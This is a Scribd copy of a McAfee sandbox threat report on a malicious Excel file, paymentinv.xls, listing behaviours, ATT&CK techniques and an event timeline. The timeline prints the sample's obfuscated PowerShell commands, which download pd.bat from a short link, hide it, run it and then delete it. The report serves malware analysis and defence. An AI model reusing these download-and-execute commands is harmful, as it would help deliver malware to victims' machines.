Scribd
Upload
30 views54 pages

Threat Analysis Report: Paymentinv

The document analyzes a file called paymentinv.xls and details its behaviors and classification. It found the file exhibits very high threat levels and behaviors like hiding, spreading, exploiting, networking and bypassing security solutions. It spawned Powershell processes and used DDE to create new processes. The timeline shows the file and processes it launched.

Uploaded by

todo nothing
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
30 views54 pages

Threat Analysis Report: Paymentinv

The document analyzes a file called paymentinv.xls and details its behaviors and classification. It found the file exhibits very high threat levels and behaviors like hiding, spreading, exploiting, networking and bypassing security solutions. It spawned Powershell processes and used DDE to create new processes. The timeline shows the file and processes it launched.

Uploaded by

todo nothing
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 54

McAfee Advanced Threat Defense

   |  Threat Analysis Report

File Name paymentinv.xls Threat Level ⬤ 5 - Very High

Malware Name TYPE_TROJAN Engine GTI File Reputation

File Submitted 2021-04-19 03:45:22 UTC Processing Time 41 seconds

File Size 281,600 bytes Sandbox Replication 27 seconds

Show More Hash Values File Details Environment

MD5 Hash Identifier F81192D7FB07CA8B5179A607B5A57A97

SHA-1 Hash Identifier CBF2655B4D3CBCC21E5F1ACA8BB57CCE4804A09F

SHA-256 Hash
D05995AB739B6B995653FEE878B9ECA8CABE75DE5C62D9F0AE9C6E5D4A0557DB
Identifier

Screenshots 2

Hide hash values

File Type 1

Hide file details

Microsoft Windows 7 Professional Service Pack 1 (build 7601, version 6.1.7601), 64-bit

Windows® Internet Explorer version: 8.0.7601.17514

Microsoft Office version: 2007

PDF Reader version: 11.0

No Flash player installed

Flash player plugin version: 22.0.0.209

Platform Version 4.12.0.7

Detection Package Version 4.12.0.201112

Hide environment

Behavior Classification

Behavior Severity

 Hiding, Camouflage, Stealthiness, Detection and Removal Protection ⬤ 5 - Very High

Spawned Powershell Process from Office application ⬤ 5 - Very High

New process created using Dynamic Data Exchange(DDE) ⬤ 4 - High

⬤ 1-
Uses the Microsoft Cryptographic APIs
Informational

Set a filter function to supersede the top-level exception handler ( ⬤ 1-


http://msdn.microsoft.com/en-us/library/vstudio/x85tt0dd.aspx ) Informational

Changed the protection attribute of the process ⬤ 1-


Informational

 Spreading ⬤ 5 - Very High

Non-PE sample executed active content by shell application ⬤ 5 - Very High

 Exploiting, Shellcode ⬤ 5 - Very High

Non-PE sample executed active content by shell application ⬤ 5 - Very High

Created and set up new security descriptor for the running process ⬤ 2 - Low

 Networking ⬤ 5 - Very High

Non-PE sample executed active content by shell application ⬤ 5 - Very High

Set a filter function to supersede the top-level exception handler ( ⬤ 1-


http://msdn.microsoft.com/en-us/library/vstudio/x85tt0dd.aspx ) Informational

⬤ 1-
Retrieved the name of the network resource associated with a local device
Informational

 Security Solution / Mechanism bypass, termination and removal, Anti Debugging, VM Detection ⬤ 2 - Low

Updated security descriptor for newly created process ⬤ 2 - Low

Ran Powershell commands from a specified file ⬤ 2 - Low


Ran Powershell commands from a specified file ⬤ 2 - Low

Hooked Windows System APIs ⬤ 2 - Low

Created named mutex object ⬤ 2 - Low

Allowed the process to perform system-level actions that were not enabled
⬤ 2 - Low
previously

Allocated and initialized security descriptor for newly created process ⬤ 2 - Low

Set a filter function to supersede the top-level exception handler ( ⬤ 1-


http://msdn.microsoft.com/en-us/library/vstudio/x85tt0dd.aspx ) Informational

Retrieved system information such as Processor Architecture,Number ⬤ 1-


Processors,Processor Type Informational

⬤ 1-
Obtained user's logon name
Informational

⬤ 1-
Altered the processes security descriptors for access control and ownership
Informational

 Data spying, Sniffing, Keylogging, Ebanking Fraud ⬤ 2 - Low

Set hook procedure to control system activities ⬤ 2 - Low

⬤ 1-
Enumerated through different files and directories on host system
Informational

 Persistence, Installation Boot Survival ⬤ Unverified

Processes Analyzed

Name Reason Severity

paymentinv.xls loaded by MATD Analyzer & dropped by paymentinv.xls ⬤ 5 - Very High

attrib.exe executed by excel & executed by powershell ⬤ Unverified

executed by excel & dropped by paymentinv.xls &


cmd.exe ⬤ 5 - Very High
executed by powershell

powershell.exe executed by cmd.exe ⬤ 5 - Very High

Timeline Activity

Processes Files Registry Operations Network Operations Multiple Operations

Select Any Area to Zoom In

paymentinv.xls

attrib.exe

cmd.exe

powers hell.exe

0 3 6 9 12 15 18
Offset in seconds

Jump to Timeline Details

Techniques Observed (MITRE ATT&CK™ Matrix)

Technique Tactics

 Execution through API Execution

Adversary tools may directly use the Windows application programming interface (API)
to execute binaries. Functions such as the Windows API CreateProcess will allow
programs and scripts to start other processes with proper path and argument
parameters.

Spawned Powershell Process from Office application ⬤ 5 - Very High

 PowerShell Execution

PowerShell is a powerful interactive command-line interface and scripting environment


included in the Windows operating system. Adversaries can use PowerShell to perform a
number of actions, including discovery of information and execution of code. Examples
include the Start-Process cmdlet which can be used to run an executable and the
Invoke-Command cmdlet which runs a command locally or on a remote computer.

Spawned Powershell Process from Office application ⬤ 5 - Very High

Ran Powershell commands from a specified file ⬤ 2 - Low

 Dynamic Data Exchange Execution

Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or
continuous inter-process communication (IPC) between applications. Once a link is
established, applications can autonomously exchange transactions consisting of
strings, warm data links (notifications when a data item changes), hot data links
(duplications of changes to a data item), and requests for command execution.

New process created using Dynamic Data


⬤ 4 - High
Exchange(DDE)

 Scripting Execution, Defense Evasion

Adversaries may use scripts to aid in operations and perform multiple actions that
would otherwise be manual. Scripting is useful for speeding up operational tasks and
reducing the time required to gain access to critical resources. Some scripting
languages may be used to bypass process monitoring mechanisms by directly interacting
with the operating system at an API level instead of calling other programs. Common
scripting languages for Windows include VBScript and PowerShell but could also be in
the form of command-line batch scripts.

Non-PE sample executed active content by shell


⬤ 5 - Very High
application

 Hooking Persistence, Privilege Escalation, Credential Access

Windows processes often leverage application programming interface (API) functions to


perform tasks that require reusable system resources. Windows API functions are
typically stored in dynamic-link libraries (DLLs) as exported functions.

Set hook procedure to control system activities ⬤ 2 - Low

 Obfuscated Files or Information Defense Evasion

Adversaries may attempt to make an executable or file difficult to discover or


analyze by encrypting, encoding, or otherwise obfuscating its contents on the system
or in transit. This is common behavior that can be used across different platforms
and the network to evade defenses.

Uses the Microsoft Cryptographic APIs ⬤ 1 - Very Low

 File and Directory Discovery Discovery

Adversaries may enumerate files and directories or may search in specific locations
of a host or network share for certain information within a file system.

Enumerated through different files and directories on


⬤ 1 - Very Low
host system

 Network Share Discovery Discovery

Networks often contain shared network drives and folders that enable users to access
file directories on various systems across a network.

Retrieved the name of the network resource


⬤ 1 - Very Low
associated with a local device

 System Information Discovery Discovery

An adversary may attempt to get detailed information about the operating system and
hardware, including version, patches, hotfixes, service packs, and architecture.

Retrieved system information such as Processor


⬤ 1 - Very Low
Architecture,Number Processors,Processor Type

Obtained user's logon name ⬤ 1 - Very Low

Timeline Activity Details

Time Offset Event Details

File
00:00:000 Operations, Retrieved the full path for the module
miscellaneous

File
00:00:000 Operations, Obtained the path of the Windows system directory
miscellaneous
00:00:000 Others Initialized a critical section object and set the spin count for the critical section

Process
Retrieved information on a specific string in the current activation context
00:00:000 Operations,
miscellaneous

Process
00:00:000 Operations, Obtained the contents of the specified variable from the environment block of the calling process
miscellaneous

Process
00:00:016 Operations, Changed the protection attribute of process address: 0x2f7830dc, new attribute: Execute_Read
miscellaneous

Process
00:00:016 Operations, Changed the protection attribute of process address: 0x2f7830dc, new attribute: Execute_ReadWrite
miscellaneous

Registry HKLM\Software\Microsoft\Windows\CurrentVersion
00:00:016
Read CommonFilesDir

Registry
00:00:016 HKLM\Software\Microsoft\Windows\CurrentVersion
Opened

Registry
00:00:032 HKCU\SOFTWARE\Microsoft\Office Test\Special\Perf
Opened

Process
Deactivated the activation context corresponding to the specified cookie
00:00:094 Operations,
miscellaneous

00:00:094 Others Obtained the system metric or system configuration setting

Process
Queried the activation context
00:00:094 Operations,
miscellaneous

Process {C1EE01F2-B3B6-4A6A-9DDD-E988C088EC82}
00:00:157 Created

Registry
00:00:157 HKCU\Software\Microsoft\Office\12.0\Excel
Opened

Registry HKCU\Software\Microsoft\Office\12.0\Excel
00:00:157
Read DisableThreadAffinity

00:00:157 Others Recorded system information

2f70368f
Thread
00:00:157
Created

Process
00:00:172 Operations, Obtained the identifier of the thread or process that created the specified window
miscellaneous

Registry
00:00:204 HKCU\Software\Microsoft\.NETFramework
Opened

Registry HKLM\SOFTWARE\Microsoft\Fusion
00:00:219
Read NoClientChecks

Registry HKLM\Software\Microsoft\.NETFramework
00:00:219
Read InstallRoot

Registry HKLM\Software\Microsoft\.NETFramework
00:00:219
Read OnlyUseLatestCLR

Registry HKLM\Software\Microsoft\.NETFramework
00:00:219
Read UseLegacyV2RuntimeActivationPolicyDefaultValue

Registry
Enumerated the values for an open registry key
00:00:219 Operations,
miscellaneous

Registry
00:00:219 HKLM\Software\Microsoft\.NETFramework\Policy\Upgrades
Opened

Registry
00:00:219 HKLM\Software\Microsoft\.NETFramework
Opened

Registry
00:00:219 HKLM\SOFTWARE\Microsoft\Fusion
Opened

File
00:00:219 Operations, Searched a directory for the name: C:\Windows\Microsoft.NET\Framework\\*
miscellaneous

C:\Windows\Microsoft.NET\Framework\\v2.0.50727\mscorwks.dll
Files 20000
00:00:219
Opened 10000000

C:\Program Files (x86)\Microsoft Office\Office12\EXCEL.EXE.config


Files Read
00:00:219
Opened Normal

C:\Windows\Microsoft.NET\Framework\\v1.0.3705\clr.dll
00:00:219 Files 20000
Opened 10000000

C:\Windows\Microsoft.NET\Framework\\v1.0.3705\mscorwks.dll
Files 20000
00:00:219 Opened 10000000

C:\Windows\Microsoft.NET\Framework\\v1.1.4322\clr.dll
Files 20000
00:00:219
Opened 10000000

C:\Windows\Microsoft.NET\Framework\\v1.1.4322\mscorwks.dll
Files 20000
00:00:219
Opened 10000000

C:\Windows\Microsoft.NET\Framework\\v2.0.50727\clr.dll
Files 20000
00:00:219
Opened 10000000

C:\Windows\Microsoft.NET\Framework\\v4.0.30319\clr.dll
Files 20000
00:00:219
Opened 10000000

00:00:219 Files Read C:\Windows\Microsoft.NET\Framework\

00:00:219 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727

File
00:00:219 Operations, Obtained a set of FAT file system attributes for a file or directory
miscellaneous

00:00:297 Others Retrieved the current local date and time

Process
00:00:610 Operations, Install a new hook procedure (type: WH_MSGFILTER)
miscellaneous

Process
00:00:610 Operations, Install a new hook procedure (type: WH_KEYBOARD)
miscellaneous

Process
00:00:625 Operations, Initialized COM library for the current thread and set it in the concurrency mode
miscellaneous

{FA445657-9379-11D6-B41A-00065B83EE53}
Process
00:00:625
Created

File
00:00:657 Operations, Obtained the current directory for the current process
miscellaneous

File
00:00:672 Operations, Searched a directory for the name: C:\Program Files (x86)\Microsoft Office\Office12\xlstart\*.*
miscellaneous

File
00:00:672 Operations, Searched a directory for the name: C:\Users\Administrator\AppData\Roaming\Microsoft\Excel\XLSTART\*.*
miscellaneous

File
00:00:938 Operations, Searched a directory for the name: C:\dgwseciilw\254f614b-21fd-47d9-99c3-f23fd434845c.xls
miscellaneous

{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}
Process
00:00:969
Created

00:01:047 Files Read C:\dgwseciilw\254f614b-21fd-47d9-99c3-f23fd434845c.xls

Socket
00:01:141 Retrieved the name of the network resource associated with a local device
Activities

00:01:141 Others Obtained the current system date and time in in Coordinated Universal Time (UTC) format

File
00:01:172 Operations, Determined whether a disk drive C:\ is a removable, fixed, CD-ROM, RAM disk, or network drive
miscellaneous

{88D969EC-8B8B-4C3D-859E-AF6CD158BE0F}
Process
00:01:297
Created

{88D969EF-F192-11D4-A65F-0040963251E5}
Process
00:01:329
Created

{0E5AAE11-A475-4C5B-AB00-C66DE400274E}
Process
00:01:735
Created

system
Process
00:01:735 Created cmd /c powershe^l^l -w 1 start`-sle`ep 7;cd "$e`nv:t`emp; ./pd.bat"

system
Process
00:01:735 cmd /c powershe^l^l -w 1 start`-sle`ep 3; move-item "pd.bat" -destination "$e`nv:t`emp"
Created

system
Process
00:01:735 cmd /c powershe^l^l -w 1 start`-sle`ep 1; attrib +s +h pd.bat
Created

system
Process
00:01:735 cmd /c powershe^l^l -w 1 start`-sle`ep 12; remove-item -path pd.bat -force
Created

system
Process
00:01:735 cmd /c powershe^l^l -w 1 (new-ob`ject net.webclient).('down'+'loadfile').invoke('https://cutt.ly/rjszlb1','pd.bat')
Created

{DFFACDC5-679F-4156-8947-C5C76BC0B67F}
Process
00:01:735
Created

Files
00:01:844 C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\254f614b-21fd-47d9-99c3-f23fd434845c.LNK
Deleted

Files
00:01:954 C:\Users\Administrator\AppData\Roaming\Microsoft\Office\Recent\dgwseciilw.LNK
Deleted

Process
00:02:266 Operations, Enabled an application to supersede the top-level exception handler
miscellaneous

Registry
00:02:266 HKCU\Software\Policies\Microsoft\Windows\System
Opened

File
00:02:282 Operations, Retrieved the full path for the module
miscellaneous

Registry
00:02:282 HKCU\Software\Microsoft\Command Processor
Opened

Registry
00:02:282 Opened HKLM\Software\Microsoft\Command Processor

Registry HKCU\Software\Microsoft\Command Processor


00:02:282
Read AutoRun

Registry HKCU\Software\Microsoft\Command Processor


00:02:282
Read CompletionChar

Registry HKCU\Software\Microsoft\Command Processor


00:02:282
Read DefaultColor

Registry HKCU\Software\Microsoft\Command Processor


00:02:282
Read DelayedExpansion

Registry HKCU\Software\Microsoft\Command Processor


00:02:282
Read DisableUNCCheck

Registry HKCU\Software\Microsoft\Command Processor


00:02:282
Read EnableExtensions

Registry HKCU\Software\Microsoft\Command Processor


00:02:282
Read PathCompletionChar

Registry HKLM\Software\Microsoft\Command Processor


00:02:282
Read AutoRun

Registry HKLM\Software\Microsoft\Command Processor


00:02:282
Read EnableExtensions

File
00:02:282 Operations, Obtained the current directory for the current process
miscellaneous

Registry HKLM\Software\Microsoft\Command Processor


00:02:282
Read CompletionChar

Registry HKLM\Software\Microsoft\Command Processor


00:02:282
Read DefaultColor

Registry HKLM\Software\Microsoft\Command Processor


00:02:282
Read DelayedExpansion

Registry HKLM\Software\Microsoft\Command Processor


00:02:282
Read DisableUNCCheck

Process
00:02:282 Operations, Obtained the contents of the specified variable from the environment block of the calling process
miscellaneous

Registry HKLM\Software\Microsoft\Command Processor


00:02:282
Read PathCompletionChar

File
00:02:296 Operations, Obtained a set of FAT file system attributes for a file or directory
miscellaneous
00:02:296 Files Read C:\Users\Administrator\Documents

File
00:02:296 Operations, Searched a directory for the name: C:\Users
miscellaneous

File
00:02:296 Operations, Searched a directory for the name: C:\Users\Administrator
miscellaneous

File
00:02:296 Operations, Searched a directory for the name: C:\Users\Administrator\Documents
miscellaneous

00:02:312 Others Retrieved information about a locale specified by a identifier

00:02:375 Files Read .

File
00:02:391 Operations, Searched a directory for the name: C:\Windows\system32\powershell
miscellaneous

File
00:02:391 Operations, Searched a directory for the name: C:\Windows\powershell
miscellaneous

c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
00:02:391 powershell -w 1 start`-sle`ep 1; attrib +s +h pd.bat
Created

c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
00:02:391 powershell -w 1 start`-sle`ep 3; move-item "pd.bat" -destination "$e`nv:t`emp"
Created

File
00:02:391 Operations, Searched a directory for the name: C:\Windows\system32\powershell.*
miscellaneous

File
00:02:391 Operations, Determined whether a disk drive C:\ is a removable, fixed, CD-ROM, RAM disk, or network drive
miscellaneous

File
00:02:391 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\powershell.*
miscellaneous

File
00:02:391 Operations, Searched a directory for the name: C:\ProgramData\Oracle\Java\javapath\powershell
miscellaneous

File
00:02:391 Operations, Searched a directory for the name: C:\Users\Administrator\Documents\powershell.*
miscellaneous

File
00:02:391 Operations, Searched a directory for the name: C:\Users\Administrator\Documents\powershell
miscellaneous

File
00:02:391 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\powershell.*
miscellaneous

File
00:02:391 Operations, Searched a directory for the name: C:\Windows\System32\Wbem\powershell
miscellaneous

File
00:02:391 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.*
miscellaneous

File
00:02:391 Operations, Searched a directory for the name: C:\Windows\powershell.*
miscellaneous

File
00:02:407 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.COM
miscellaneous

File
00:02:407 Operations, Searched a directory for the name: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
miscellaneous

c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
00:02:407 powershell -w 1 start`-sle`ep 7;cd "$e`nv:t`emp; ./pd.bat"
Created

c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
00:02:407 powershell -w 1 start`-sle`ep 12; remove-item -path pd.bat -force
Created

Process
00:02:437 Operations, Enabled an application to supersede the top-level exception handler
miscellaneous

File
00:02:437 Operations, Retrieved the full path for the module
miscellaneous

{A2A9545D-A0C2-42B4-9708-A0B2BADD77C8}
Process
00:02:454 Created

{90AA3A4E-1CBA-4233-B8BB-535773D48449}
Process
00:02:454
Created

{77F10CF0-3DB5-4966-B520-B7C54FD35ED6}
Process
00:02:454
Created

c:\windows\system32\windowspowershell\v1.0\powershell.exe
Process
00:02:454 powershell -w 1 (new-ob`ject net.webclient).('down'+'loadfile').invoke('https://cutt.ly/rjszlb1','pd.bat')
Created

Process
00:02:469 Operations, Initialized COM library for the current thread and set it in the concurrency mode
miscellaneous

{660B90C8-73A9-4B58-8CAE-355B7F55341B}
Process
00:02:469
Created

{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}
Process
00:02:484
Created

{1F3427C8-5C10-4210-AA03-2EE45287D668}
Process
00:02:891
Created

{F3364BA0-65B9-11CE-A9BA-00AA004AE837}
Process
00:02:891
Created

{603D3801-BD81-11D0-A3A5-00C04FD706EC}
Process
00:02:921
Created

{DD313E04-FEFF-11D1-8ECD-0000F87A470C}
Process
00:02:937
Created

{00021401-0000-0000-C000-000000000046}
Process
00:03:579
Created

Process {76765B11-3F95-4AF2-AC9D-EA55D8994F1A}
00:03:579 Created

{2D3468C1-36A7-43B6-AC24-D3F02FD9607A}
Process
00:03:609
Created

File
00:03:704 Operations, Searched a directory for the name: C:\Windows\system32\windowspowershell\v1.0\powershell_ise.exe
miscellaneous

00:03:704 Others Expanded environment-variable strings and replace them with the values defined for the current use

Registry
00:03:891 HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
Opened

Registry HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
00:03:891
Read RuntimeVersion

Registry HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
00:03:891
Read PowerShellVersion

Registry HKLM\SOFTWARE\Microsoft\PowerShell\1
00:03:891
Read

Registry
00:03:891 HKLM\SOFTWARE\Microsoft\PowerShell
Opened

Registry HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine
00:03:907
Read ConsoleHostAssemblyName

Registry
00:03:921 HKLM\Software\Microsoft\.NETFramework
Opened

Registry HKLM\Software\Microsoft\.NETFramework
00:03:921
Read InstallRoot

Process
00:03:921 Operations, Obtained the contents of the specified variable from the environment block of the calling process
miscellaneous

File
00:03:921 Operations, Obtained a set of FAT file system attributes for a file or directory
miscellaneous

C:\Windows\Microsoft.NET\Framework\\v1.0.3705\clr.dll
Files 20000
00:03:937
Opened 10000000

Registry
00:03:937 HKCU\Software\Microsoft\.NETFramework
Opened
File
00:03:937 Operations, Searched a directory for the name: C:\Windows\Microsoft.NET\Framework\\*
miscellaneous

00:03:937 Files Read C:\Windows\Microsoft.NET\Framework\

C:\Windows\Microsoft.NET\Framework\\v1.0.3705\mscorwks.dll
Files 20000
00:03:954
Opened 10000000

C:\Windows\Microsoft.NET\Framework\\v1.1.4322\clr.dll
Files 20000
00:03:954
Opened 10000000

C:\Windows\Microsoft.NET\Framework\\v1.1.4322\mscorwks.dll
Files 20000
00:03:954
Opened 10000000

C:\Windows\Microsoft.NET\Framework\\v2.0.50727\clr.dll
Files 20000
00:03:954
Opened 10000000

C:\Windows\Microsoft.NET\Framework\\v2.0.50727\mscorwks.dll
Files 20000
00:03:954
Opened 10000000

Files
00:03:969 C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X43D78XIIKCRAJNR9GZN.temp
Deleted

00:03:969 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727

Registry HKLM\SOFTWARE\Microsoft\Fusion
00:03:969
Read NoClientChecks

Registry
00:03:969 HKLM\SOFTWARE\Microsoft\Fusion
Opened

Registry HKLM\Software\Microsoft\.NETFramework
00:03:969
Read OnlyUseLatestCLR

Registry HKLM\Software\Microsoft\.NETFramework
00:03:969
Read UseLegacyV2RuntimeActivationPolicyDefaultValue

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe.config
Files Read
00:03:969
Opened Normal

C:\Windows\Microsoft.NET\Framework\\v4.0.30319\clr.dll
Files 20000
00:03:969
Opened 10000000

Signal
00:03:984 Opened an existing named event object
Objects

C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
Files 20000
00:03:984
Opened 10000000

Registry HKLM\Software\Microsoft\.NETFramework
00:03:984
Read DisableConfigCache

Process
00:04:000 Operations, Changed the protection attribute of process address: 0x72f11fdc, new attribute: Execute_ReadWrite
miscellaneous

Process
00:04:000 Operations, Changed the protection attribute of process address: 0x72f11fdc, new attribute: Execute_Read
miscellaneous

00:04:015 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll

Registry
00:04:032 HKLM\Software\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000\mscorwks.dll
Opened

Registry
00:04:032 Opened HKLM\Software\Microsoft\.NETFramework\Policy\AppPatch\v4.0.30319.00000

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config
Files Read
00:04:032
Opened Normal

Registry
00:04:032 HKLM\Software\Microsoft\.NETFramework\Policy\AppPatch
Opened

00:04:032 Files Read C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\machine.config

Process
00:04:046 Operations, Determined whether the specified process is running under WOW64
miscellaneous
Registry
00:04:046 HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe
Opened

Registry
00:04:046 HKLM\Software\Microsoft\Fusion
Opened

Registry
00:04:063 HKCU\Software\Microsoft\Fusion
Opened

00:04:063 Others Initialized a new security descriptor

00:04:063 Others Allocated and initialized a security identifier (SID)

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read ForceLog

Registry HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options


00:04:063
Read DevOverrideEnable

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read LogFailures

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read EnableLog

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read DownloadCacheQuotaInKB

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read DisableMSIPeek

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read CacheLocation

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read LogResourceBinds

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read LoggingLevel

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read NoClientChecks

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read UseLegacyIdentityFormat

Registry HKLM\Software\Microsoft\Fusion
00:04:063
Read VersioningLog

Registry
00:04:063 HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options
Opened

00:04:079 Others Obtained information about an access token

Process
00:04:079 Operations, Opened the access token associated with a thread
miscellaneous

Memory
00:04:079 Opened a named file-mapping object
Mapped Files

Process
00:04:079 Operations, Opened the access token associated with a process
miscellaneous

00:04:079 Others Set information in a security discretionary access control list (DACL)

Signal
00:04:110 global\cordbipcsetupsyncevent_2548
Objects

Signal
00:04:110 global\cordbipcsetupsyncevent_2804
Objects

Process powershell.exe
00:04:125
Opened QueryInformation

Signal
00:04:125 global\cordbipcsetupsyncevent_2540
Objects

Process
Decremented a thread's suspend count
00:04:125 Operations,
miscellaneous

72fe9a9f
Thread
00:04:125
Created

Process
00:04:140 Operations, Changed the protection attribute of process address: 0x72f12be4, new attribute: Execute_ReadWrite
miscellaneous

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config
Files Read
00:04:157
Opened Normal

Registry
00:04:157 HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2969830022-2362906686-2146684197-500
Opened
C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\security.config.cch
Files
00:04:157 Read
Opened
Normal

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config
Files Read
00:04:157
Opened Normal

Registry
00:04:157 HKLM\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\LocalIntranet
Opened

Registry
00:04:157 HKLM\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets\Internet
Opened

Registry
00:04:157 HKLM\Software\Microsoft\.NETFramework\Security\Policy\Extensions\NamedPermissionSets
Opened

00:04:157 Signal global\cordbipcsetupsyncevent_2532


Objects

C:\Windows\Microsoft.NET\Framework\v2.0.50727\config\enterprisesec.config.cch
Files Read
00:04:157
Opened Normal

C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch


Files Read
00:04:171
Opened Normal

Signal
00:04:171 global\cordbipcsetupsyncevent_2808
Objects

File
00:04:171 Operations, Obtained path of the folder from its CLSID
miscellaneous

Registry
00:04:171 HKLM\Software\Microsoft\.NETFramework\v2.0.50727\Security\Policy
Opened

C:\Users\Administrator\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config


Files Read
00:04:171
Opened Normal

Registry
00:04:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index127
Opened

Registry
00:04:188 HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
Created

C:\Windows\assembly\NativeImages_v2.0.50727_32\index127.dat
Files Read
00:04:188
Opened Normal

Registry HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default
00:04:188
Read mscorlib,2.0.0.0,,b77a5c561934e089,x86

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
00:04:188
Read LatestIndex

Registry
00:04:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
00:04:188
Read Modules

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:04:188
Read Status

Registry
00:04:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
00:04:188
Read SIG

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
00:04:188
Read LastModTime

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
00:04:188
Read DisplayName

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83
00:04:188
Read Status

73078014
Thread
00:04:188
Created

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:04:188
Read ConfigMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:04:188
Read ConfigString

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:04:188
Read DisplayName
Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:04:188
Read EvalationData

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:04:188
Read ILDependencies

Registry
00:04:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
Opened

Registry
00:04:188 HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5
Opened

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:04:188
Read MVID

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:04:188
Read MissingDependencies

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index127
00:04:188
Read NIUsageMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index127
00:04:188
Read ILUsageMask

Registry HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83
00:04:188
Read NIDependencies

File
00:04:218 Operations, Searched a directory for the name: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.INI
miscellaneous

Process
00:04:235 Operations, Set a waiting mode until a specified object is in the signaled state or the time-out interval elapses
miscellaneous

Process
Queried the activation context
